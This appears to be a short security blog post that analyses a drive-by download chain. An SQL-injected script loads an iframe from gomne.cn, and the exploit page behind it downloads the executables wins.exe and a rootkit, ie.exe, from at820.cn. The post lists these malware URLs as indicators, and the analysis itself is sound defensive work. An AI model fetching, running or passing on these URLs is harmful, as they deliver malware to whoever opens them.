This sql-injected script calls iframe http://www.gomne.cn/yh.htm

yh.htm has the same vulnerability exploits as the previous post. Most likely from the same kit.

The exploits download malicious executable from http://www.at820.cn/wins.exe [VT results]

CWSandbox analysis of wins.exe shows further download such as rootkit http://www.at820.cn/ie.exe [VT results]

Note that all 3 domains tsnse.cn, http://www.gomne.cn and http://www.at820.cn resolve to the same IP address


Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )


Connecting to %s

%d bloggers like this: